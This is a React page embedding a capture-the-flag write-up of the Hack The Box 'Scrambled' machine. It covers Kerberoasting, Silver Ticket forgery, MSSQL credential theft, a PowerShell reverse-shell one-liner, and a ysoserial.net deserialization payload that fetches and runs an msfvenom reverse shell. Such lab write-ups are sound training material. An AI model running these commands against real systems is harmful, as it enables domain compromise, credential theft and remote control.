import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import {Prism as SyntaxHighlighter} from 'react-syntax-highlighter'
import {dracula} from 'react-syntax-highlighter/dist/esm/styles/prism'
import './htb.css'

const markdown = `
### Machine IP: 10.10.11.168

![](/writeups/Scrambled/title.png)

Author: Arman
* https://github.com/ArmanHZ
* https://app.hackthebox.com/profile/318304

__Note: This write up was written in multiple days. That is why sometimes the IP address for the payloads vary slightly.__

---

### Initial Enumeration
As usual, we start with an \`nmap\` scan.

\`\`\`bash
mkdir nmap
nmap -sC -sV -v -oN nmap/initial_scan 10.10.11.168 
\`\`\`

\`\`\`text
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Scramble Corp Intranet
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-11 21:19:49Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-07-11T21:20:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T15:30:57
| Not valid after:  2023-06-09T15:30:57
| MD5:   679c fca8 69ad 25c0 86d2 e8bb 1792 d7c3
|_SHA-1: bda1 1c23 bafc 973e 60b0 d87c c893 d298 e2d5 4233
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T15:30:57
| Not valid after:  2023-06-09T15:30:57
| MD5:   679c fca8 69ad 25c0 86d2 e8bb 1792 d7c3
|_SHA-1: bda1 1c23 bafc 973e 60b0 d87c c893 d298 e2d5 4233
|_ssl-date: 2022-07-11T21:20:37+00:00; 0s from scanner time.
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
\`\`\`

We see that there is a web service, as well as Active Directory related services. Another important thing is that we get the domain controller's common name. We can add these to our \`/etc/hosts\` file.

\`\`\`bash
# /etc/hosts
10.10.11.168 scrm.local0 scrm.local dc1.scrm.local
\`\`\`

Now, let us check out the website.

### Website Enumeration
Running directory brute force tools does not reveal anything important for this box. All the information we need is already given to us.

On \`http://10.10.11.168/support.html\`, we see the following message:

![](/writeups/Scrambled/support_message.png)

This tells us that we cannot access the services such as \`smb\` using password. We have to go through the \`Kerberos\` authentication route.
We also get 4 more links.

The \`http://10.10.11.168/newuser.html\`, does not contain any useful information, however, the other links do.

In \`http://10.10.11.168/supportrequest.html\`, we get the following information:

![](/writeups/Scrambled/supportrequest_info.png)

We get another host name \`scramblecorp\` that we can add to our \`/etc/hosts\` file. (This does not lead to anywhere and we still get the same page)
Most importantly, we get a username \`ksimpson\`.

Moving to \`http://10.10.11.168/salesorders.html\`, we get the following information:

![](/writeups/Scrambled/salesorders_port.png)
From the above figure, we can see an odd port of \`4411\`. This tells us that we need to perform an all ports scan with \`nmap\`, since there may be more ports that we did not find with our initial \`nmap\` scan. (The arrow was already in the picture)

Lastly, from \`http://10.10.11.168/passwords.html\`, we get the following:

![](/writeups/Scrambled/password_reset_info.png)

So, most likely, the user \`ksimpson\` has the password \`ksimpson\` as well.

### Second nmap Scan
Let us do an all ports scan with \`nmap\`.

\`\`\`bash
nmap -v -p- -T4 -oN nmap/all_ports 10.10.11.168
\`\`\`

\`\`\`text
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4411/tcp  open  found
5985/tcp  open  wsman
9389/tcp  open  adws
\`\`\`

We found more ports! Now it's time to poke around the various services.

---

### Initial Foothold
First, let us check the port \`4411\`, which was mentioned on the website.

![](/writeups/Scrambled/4411_first_try.png)

Looks like we need the find out the right commands. We will come back to this later.

Now, let us check that \`ksimpson:ksimpson\` is a valid username:password combo. Since we cannot use NTLM login, we can use \`kerbrute\` to perform a \`kerberos\` pre-authentication brute force.

![](/writeups/Scrambled/ksimpson_valid_user.png)

Now, we should be able to get a TGT and use that to access services such as \`smb\`.

We will be using python scripts from \`Impacket\` (https://github.com/SecureAuthCorp/impacket)

\`\`\`bash
python3 getTGT.py scrm.local/ksimpson:ksimpson -k
\`\`\`

![](/writeups/Scrambled/ksimpson_tgt.png)

When using \`dc1.scrm.local\`, we get a wrong realm error. Probably \`ksimpson\` is not allowed on the \`DC\`. Trying \`scrm.local\` works and we get the TGT as \`ksimpson.ccache\`.
Before using the Impacket's \`smbclient\`, we must run the following command:

\`\`\`bash
export KRB5CCNAME=ksimpson.ccache
\`\`\`

By doing this, the Impacket tools will be able to use the TGT.

Let us try accessing the \`smb\` shares.

\`\`\`bash
# smbclient from Impacket
python3 smbclient.py -no-pass -k scrm.local/ksimpson@dc1.scrm.local
\`\`\`

Looking through shares, we find an interesting file that we can access in the \`Public\` share. We cannot access the others.

![](/writeups/Scrambled/network_security_changes_pdf.png)

Reading the PDF, we get the following information:

\`\`\`text
Change: The attacker was able to retrieve credentials from an SQL database used by our HR software
so we have removed all access to the SQL service for everyone apart from network administrators.
\`\`\`

So, we need an admin account to access the SQL database and get the credentials.

Now let us try to get other AD users.

\`\`\`bash
python3 GetADUsers.py scrm.local/ksimpson -no-pass -k -dc-host dc1.scrm.local
# or
python3 GetADUsers.py scrm.local/ksimpson:ksimpson -k -dc-host dc1.scrm.local
\`\`\`

![](/writeups/Scrambled/impacket_get_users.png)

Looks like we don't get anything. Now let us try getting Service Principle Names or SPNs for possible service accounts. 

\`\`\`bash
python3 GetUserSPNs.py scrm.local/ksimpson -no-pass -k -dc-host dc1.scrm.local
# or
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -k -dc-host dc1.scrm.local
\`\`\`

![](/writeups/Scrambled/impacket_get_spns.png)

Nice! We got \`MSSQLSvc\` or \`sqlsvc\` service.

Now we can run the same command with the \`-request\` flag to get the service's encrypted password from TGS.

![](/writeups/Scrambled/impacket_get_spns_2.png)

Cracking the password with \`hashcat\`, we get the password \`Pegasus60\`.

Since this is an AD service account, this makes it vulnerable to Silver Ticket attack. We can use the \`sqlsvc\` account to create an \`Administrator\` ticket for the \`sql\` service.

First, we need to get the TGT for \`sqlsvc\`.

\`\`\`bash
python3 getTGT.py scrm.local/sqlsvc:Pegasus60 -k
\`\`\`

And again, we have to export the ccache file:

\`\`\`bash
export KRB5CCNAME=sqlsvc.ccache
\`\`\`

We will use the \`ticketer.py\` for creating the Silver Ticket, however, this script requires two values. One the \`nthash\` of our password, the other is the \`domain SID\`.

We can create the \`nthash\` (or NTLM hash) as follows: (The algorithm is described here: https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4)

\`\`\`bash
echo -n "Pegasus60" | iconv -t UTF-16LE | openssl md4
# output: b999a16500b87d17ec7f2e2a68778f05
\`\`\`

Now, we need to get the Domain SID.

The \`PAC\` or Privilege Attribute Certificate contains the SID. Running the following command: (Note: there are other ways to get the Domain SID)

\`\`\`bash
python3 getPac.py -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60
\`\`\`

And we get the following Domain SID:

\`\`\`text
S-1-5-21-2743207045-1827831105-2542523200
\`\`\`

Now, time for the Silver Ticket. Running the following command:

\`\`\`bash
python3 ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain scrm.local -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -spn sqlsvc/scrm.local Administrator
\`\`\`

We get the \`Administrator.ccache\` file. And again we have to export the TGT.

\`\`\`bash
export KRB5CCNAME=Administrator.ccache
\`\`\`

Finally, trying to access the \`sql\` service:

\`\`\`bash
python3 mssqlclient.py scrm.local -no-pass -k
\`\`\`

![](/writeups/Scrambled/sql_access_admin.png)

Nice! Now, let us check out some databases and tables.

Running the command \`SELECT name FROM master.sys.databases\`, we get:

![](/writeups/Scrambled/databases.png)

The \`ScrambleHR\`, looks interesting. Let's check it out.

![](/writeups/Scrambled/tables.png)

We have 3 tables. Let's see their contents.

![](/writeups/Scrambled/miscsvc_creds.png)

Good! Now we have another user \`MiscSvc:ScrambledEggs9900\`.

Now, it's time for a reverse shell to the system.

---

### Reverse Shell
First, we need to have a reverse shell one liner. We will be using this one: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Before, we can use it, we need to convert it to \`UTF-16LE\` and then to base64 (for ease of use)

\`\`\`bash
echo -n '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",9999);$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};$client.Close()' | iconv -t UTF-16LE | base64 -w 0
\`\`\`

And have \`netcat\` listening on port \`9999\`:

\`\`\`bash
nc -lvnp 9999
\`\`\`

Finally, from the \`sql\` session run the following:

![](/writeups/Scrambled/sql_reverse_shell.png)

And on the \`netcat\`, we get:

![](/writeups/Scrambled/sql_reverse_shell_2.png)

This user does not have the flag!

Searching around and running \`WinPeas\` as the \`sqlsvc\` user did not result in any interesting finding. Now it's time to use the \`MiscSvc\` user.

---

### Privilege Escalation
For this part we need to run a command as the \`MiscSvc\` user while we are the \`sqlsvc\` user. This would be easy if this was a Linux box, however that is not the case.

To perform this task, I have created this script: https://github.com/ArmanHZ/Run-As-Powershell

We must transfer the \`Run-As.ps1\` script to the Windows machine.

On our machine, we will run the following in the cloned repository's directory:

\`\`\`bash
python3 -m http.server 9001
\`\`\`

And from the Windows machine, the following:

\`\`\`powershell
cd $home\\Documents
Invoke-WebRequest -Uri http://10.10.14.5:9001/Run-As.ps1 -OutFile Run-As.ps1
\`\`\`

Result should be like this:

![](/writeups/Scrambled/copy_run_as.png)

Now, let us run the following command for the second reverse shell.

Also we need another \`netcat\` listening for that!

\`\`\`powershell
.\\Run-AS.ps1 -u MiscSvc -p ScrambledEggs9900 -cn DC1 -rs -lh 10.10.14.5 -lp 9998
\`\`\`

You should get:

![](/writeups/Scrambled/second_reverse_shell.png)

Good! Now we can also read the \`user.txt\` file in the \`C:\\Users\\miscsvc\\Desktop\` directory.

After looking around a bit, we find the following files related to the software mentioned on the website:

![](/writeups/Scrambled/scramble_software.png)

Now, we can copy a 64-bit \`netcat.exe\` to the Windows machine and download the \`exe\` and \`dll\` from our Linux machine. 

Netcat for Windows can be found here: https://github.com/int0x33/nc.exe/
The copy process is similar to copying the \`Run-AS.ps1\` to the Windows machine, so I won't re-write the commands again.

---

### Analyzing the Software
Using the \`file\` command on the downloaded \`exe\` and \`dll\`, we can see that they are \`.NET Assembly\`.

So, we need a \`.NET\` disassembler. We will be using \`dotPeak\` tool provided by \`JetBrains\`. However, this tool is only available on Windows, so we will be using our Windows VM.

The commands can be found while disassembling the \`ScrambleLib.dll\` file's \`ScrambleNetRequest\` class under \`ScrambleLib\` namespace.

![](/writeups/Scrambled/Pasted_image_20220730161320.png)
We can test these commands with the app running on port \`4411\`.

![](/writeups/Scrambled/testing_commands.png)

We can see that \`LOGON\`, does not do anything and if we inspect the code, we can also see that it leads nowhere.

However, we can see that \`LIST_ORDER\` gives us two \`base64\` encoded outputs and when we try to upload we see something about deserializing. So, we need to perform a dot net deserializing attack.

We can get more idea on how the encryption works from the decompiler too:

![](/writeups/Scrambled/Pasted_image_20220730162530.png)

\`BinaryFormatter\` and \`base64\` are the key words.

---

### Root
We will be using \`ysoserial.net\` (https://github.com/pwntester/ysoserial.net)

There are examples on what we are trying to accomplish, however, the \`PSObject\` gadget will cause an error. After trying other gadgets compatible with \`BinaryFormatter\`, \`WindowsIdentity\` was the correct option. I am not knowledgeable in C# and .NET to know the differences between the gadgets.

This tool is also only available on Windows.

On the Linux VM, we will use \`msfvenom\` to create a x64 reverse shell payload:

\`\`\`bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=9000 -f exe > rev.exe
\`\`\`

On the Windows VM, we will create an appropriate output using \`ysoserial.exe\`. This output will both upload the payload to the victim and execute it, granting us a root shell.

We also need to run \`python3 -m http.server 9001\` in the directory where the \`rev.exe\` is stored.

Back to Windows. We will run the following and execute it via \`UPLOAD_ORDER\`.

\`\`\`powershell
.\\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -c Invoke-WebRequest -Uri http://10.10.14.10:9001/rev.exe -OutFile rev.exe && .\rev.exe"
\`\`\`

![](/writeups/Scrambled/Pasted_image_20220730164802.png)

Listening on \`9000\`, we get:

![](/writeups/Scrambled/root.png)

And we have root!
`;

export default function Scrambled() {
  return (
    <div className='writeup-div'>
      <ReactMarkdown
      children={markdown}
      remarkPlugins={[remarkGfm]}
      components={{
        code({node, inline, className, children, ...props}) {
          const match = /language-(\w+)/.exec(className || '')
          return !inline && match ? (
            // @ts-ignore
            <SyntaxHighlighter children={String(children).replace(/\n$/, '')} style={dracula} language={match[1]} PreTag="div" {...props} />
          ) : (
            <code className={className} {...props}>
              {children}
            </code>
          )
        }
      }}
      />
    </div>
  )
}